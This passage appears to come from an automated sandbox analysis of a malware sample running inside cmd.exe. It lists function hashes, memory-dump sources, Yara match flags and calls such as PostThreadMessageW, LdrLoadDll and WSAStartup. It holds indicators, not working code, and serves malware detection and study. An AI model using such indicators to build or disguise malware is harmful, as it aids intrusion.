                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
                                                                        • Instruction ID: 9aae4f90b66b1d0439a70a07146eaaf3d50e46b2756573d976e3e626b04ba578
                                                                        • Opcode Fuzzy Hash: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
                                                                        • Instruction Fuzzy Hash: FA900225321404430145F658470450B044597DA351395D015F5517590CC72189655721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
                                                                        • Instruction ID: 138c7b80c63973a3d312be016b0041e735ab1aed7ba29f22a0c42691ec54b3e4
                                                                        • Opcode Fuzzy Hash: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
                                                                        • Instruction Fuzzy Hash: 0C90026134140883D100B2588514B060005C7E5301F55D015F5165554D8719CD526526
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
                                                                        • Instruction ID: 3e932c8702bb2ef7f1f4712e491f2f3f668f2178d8323ca15cb139096646abde
                                                                        • Opcode Fuzzy Hash: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
                                                                        • Instruction Fuzzy Hash: FD900221701404834140B268C9449064005ABE5211755D121B4A99550D875989655A65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
                                                                        • Instruction ID: 85e79b2067a85b372341419b3418a5916e21580b188f84dc11c6d2f9ca668377
                                                                        • Opcode Fuzzy Hash: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
                                                                        • Instruction Fuzzy Hash: 4E900221311C0483D200B6688D14B07000587D4303F55D115B4255554CCB1589615921
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
                                                                        • Instruction ID: a16a9aaffde61058cfe999cfc2459b1de852243259818702b0c9e4cc910dd09d
                                                                        • Opcode Fuzzy Hash: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
                                                                        • Instruction Fuzzy Hash: 4B90026130180843D140B6588904607000587D4302F55D011B6165555E8B298D516535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
                                                                        • Instruction ID: 1c34d9e4b0c002d6c2feb61485ae1960c3fd017e73163aeb4f9a33894fd19a05
                                                                        • Opcode Fuzzy Hash: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
                                                                        • Instruction Fuzzy Hash: 6E90022931340443D180B258950860A000587D5202F95E415B4116558CCB1589695721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
                                                                        • Instruction ID: 707562966d43ea5fc17588d61ab043787c107e90e4819f727a50a83141362bea
                                                                        • Opcode Fuzzy Hash: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
                                                                        • Instruction Fuzzy Hash: 1B90022130140443D140B25895186064005D7E5301F55E011F4515554CDB1589565622
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
                                                                        • Instruction ID: 01ba7ec41d4f7203090c5a0465dcdbd4a31e6e561707b296b01431390499de7a
                                                                        • Opcode Fuzzy Hash: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
                                                                        • Instruction Fuzzy Hash: 7D900221342445935545F2588504507400697E4241795D012B5515950C87269956DA21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
                                                                        • Instruction ID: 0ae27c54dfd0d537dc4dad5c240cf07dfe5b9875c13104f3e7084c2a719ae119
                                                                        • Opcode Fuzzy Hash: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
                                                                        • Instruction Fuzzy Hash: C990023130140853D111B2588604707000987D4241F95D412B4525558D97568A52A521
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
                                                                        • Instruction ID: 7daee188a8104999bc7a9112672e8b4c33101dda7119bfab3691811213822f46
                                                                        • Opcode Fuzzy Hash: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
                                                                        • Instruction Fuzzy Hash: D290023130148C43D110B258C50474A000587D4301F59D411B8525658D879589917521
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
                                                                        • Instruction ID: 8a0c24688bd6bdcb37fe90bbb067c54145cb56ab3382a4fab57aafc3d061ed59
                                                                        • Opcode Fuzzy Hash: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
                                                                        • Instruction Fuzzy Hash: F990023130140C83D100B2588504B46000587E4301F55D016B4225654D8715C9517921
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
                                                                        • Instruction ID: b86901433d9e28b6ce70228fa7b0a1deb04aaefe3cb6c099b77d5d98996e0472
                                                                        • Opcode Fuzzy Hash: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
                                                                        • Instruction Fuzzy Hash: 4990023130140843D100B6989508646000587E4301F55E011B9125555EC76589916531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
                                                                        • Instruction ID: d09237ce8c9b04f96cab15f2d49ee141efc9f31f5cbaf97d129cd958293f5348
                                                                        • Opcode Fuzzy Hash: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
                                                                        • Instruction Fuzzy Hash: 3D90023170550843D100B2588614706100587D4201F65D411B4525568D87958A5169A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
                                                                        • Instruction ID: 206fee6b86b97dbde1b484679f74e47213d2f6e17d41ccca39f0a48cd7c1b0a6
                                                                        • Opcode Fuzzy Hash: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
                                                                        • Instruction Fuzzy Hash: 9390022134545543D150B25C85046164005A7E4201F55D021B4915594D875589556621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph image not reproduced. Basic blocks span 2840376-2840510; block 2840480-28404ea calls 28599c0, 285a3d0, 2843e60, 2831410 and 2850ce0, then block 28404ec-28404fb calls PostThreadMessageW and exits through 28404fd-2840507 or 284050a-2840510.
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: 43134e50cc7a06775172646e7f07a8ae796d332ce13ea25c3e19cdb95e2ff928
                                                                        • Instruction ID: 182d193d68cdb1d8508ea34d98b39b27b5fa75a87181ee566d250933e3bb7666
                                                                        • Opcode Fuzzy Hash: 43134e50cc7a06775172646e7f07a8ae796d332ce13ea25c3e19cdb95e2ff928
                                                                        • Instruction Fuzzy Hash: 8831AF7E90420CBBE7159A984C81DEFBF6CEF01278F54826DEE54E7141EB254A078BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: adf48eb09678d213e8e502bdff382f63c4b52240190bba6b7a811287ea47f8f7
                                                                        • Instruction ID: f70acc49ecf6aa9e563fb179709d27f379a849b509298cde464f48afdb9fff35
                                                                        • Opcode Fuzzy Hash: adf48eb09678d213e8e502bdff382f63c4b52240190bba6b7a811287ea47f8f7
                                                                        • Instruction Fuzzy Hash: 5C01E579D0015CBADB019AE58C81DEF7B7CDF01794F458064FA04E7100E6385E068BB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: aa15bfedecffb46972eadfcb0b5a986ba7d1d5a8dd7a82fd0bc76cdc92adc85d
                                                                        • Instruction ID: 391a451901e623fd54cb11c5060a5b8b3d9d9be9fde84dbfe91f23445044db67
                                                                        • Opcode Fuzzy Hash: aa15bfedecffb46972eadfcb0b5a986ba7d1d5a8dd7a82fd0bc76cdc92adc85d
                                                                        • Instruction Fuzzy Hash: E701C479D0011CBBDB11AAE58C81DEF7B7CEF41794F458064FA04E7100E6785E068BB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph image not reproduced. Basic blocks span 2840419-2840510; block 2840499-284049f continues either via 28404a0 (call 285a3d0) or directly into 28404a5-28404ea (calls 2843e60, 2831410, 2850ce0), then block 28404ec-28404fb calls PostThreadMessageW and exits through 28404fd-2840507 or 284050a-2840510.
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: 21cc48393310c33b233fb5514333d948663fe40a5f1bdf6eca74525dfac79539
                                                                        • Instruction ID: a647f8e9385f9c1d3a95f24255841c09bfd2ecab08f2c695b7efe556675f4e03
                                                                        • Opcode Fuzzy Hash: 21cc48393310c33b233fb5514333d948663fe40a5f1bdf6eca74525dfac79539
                                                                        • Instruction Fuzzy Hash: 3601287AD0011CBB8B119AE45C80DEF6B6CDF41358F96C595EE08FB200EA394E064BE2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 0285268B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: fd95a50efc9080267c9f739c816b20bfb6b4f6f58e296726e0beddb676278541
                                                                        • Instruction ID: e59f736c68f01e5cc371b887d7a76031ea5e54b9bfea67a54691b98a5f6dc747
                                                                        • Opcode Fuzzy Hash: fd95a50efc9080267c9f739c816b20bfb6b4f6f58e296726e0beddb676278541
                                                                        • Instruction Fuzzy Hash: AD3181B9601705BBC714DF64C884FE7BBA9BB48304F00852DEA5D9B245DB70BA44CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02843ED2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID: r
                                                                        • API String ID: 2234796835-1812594589
                                                                        • Opcode ID: 1e4028a37386456fed0e9081d3f30b2fe1b7b3fc2cf7d8954cb7478db5a2e092
                                                                        • Instruction ID: eb8c94111a4811994be7f9093b7d768875dca5b2e533f4c6b85524b05c825209
                                                                        • Opcode Fuzzy Hash: 1e4028a37386456fed0e9081d3f30b2fe1b7b3fc2cf7d8954cb7478db5a2e092
                                                                        • Instruction Fuzzy Hash: EE118C39E0028EAFCB01CE54C845B5AB7A4DF85644F188ADCE849CF242E730DA06CBD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0284E647
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 2538663250-2016760708
                                                                        • Opcode ID: 7f0e713acc172d27c6742d678114a191414d25f959b36308923f0231d7236bb1
                                                                        • Instruction ID: 3425fad1f3e1e5825f9348cebba4a15b83a1b787a420cd7008ebe849ef6bb83b
                                                                        • Opcode Fuzzy Hash: 7f0e713acc172d27c6742d678114a191414d25f959b36308923f0231d7236bb1
                                                                        • Instruction Fuzzy Hash: D8313279A00609DFDB00DFD8DC80DEEB7B9BF88304B108559EA05E7244D775EA45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0284E647
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 2538663250-2016760708
                                                                        • Opcode ID: a92d46da9632d06b8151a11b4dedd4a856aa46f093c95b5486c85939da8b5b9a
                                                                        • Instruction ID: a384f9dbeeee5c62dec72f1ff046b6cc52b0621b8904621db174e76ef1aa8616
                                                                        • Opcode Fuzzy Hash: a92d46da9632d06b8151a11b4dedd4a856aa46f093c95b5486c85939da8b5b9a
                                                                        • Instruction Fuzzy Hash: 02311079A006099FDB00DFD8D880DEEB7B9BF88304B108559EA05E7254DB75AA05CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: db6a1bae41a569e943a94a2c7569583de2664da14132bacb5b971e8e1956401f
                                                                        • Instruction ID: 2937fed877937825976707824114e178f8fb3a8a7200deee73f0a6932d7de2d5
                                                                        • Opcode Fuzzy Hash: db6a1bae41a569e943a94a2c7569583de2664da14132bacb5b971e8e1956401f
                                                                        • Instruction Fuzzy Hash: 0E9143BDE00219ABDB15DFA8CC44BEEB7B5AF08744F144129E90CE7240EB746685CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: d028bb36a33c09b9eb25ca0399b605445c9ff9a1713327381dff359f7f122d1b
                                                                        • Instruction ID: fa3e37041bb556fb7235a6b5866c88c154d509f842470be8bd0fabecb1de463f
                                                                        • Opcode Fuzzy Hash: d028bb36a33c09b9eb25ca0399b605445c9ff9a1713327381dff359f7f122d1b
                                                                        • Instruction Fuzzy Hash: FD9153BDD00219ABDB14DFA8CC44BEEBBB5AF08744F144129E90CE7240EB746685CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: 31a6d184ab798ab025a22dddd7c6b7f71f86800ac270208832e9b62ef0a62e6d
                                                                        • Instruction ID: d71ac27e8b107a35f9d47ae70def05b22b53438096db24141a2c682a796de8e2
                                                                        • Opcode Fuzzy Hash: 31a6d184ab798ab025a22dddd7c6b7f71f86800ac270208832e9b62ef0a62e6d
                                                                        • Instruction Fuzzy Hash: 1811C47DD05219AFDB01DBE88C81BDEB7F9AF09714F140156D908F3141EB61AA488BEA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02843ED2
                                                                        Memory Dump Source
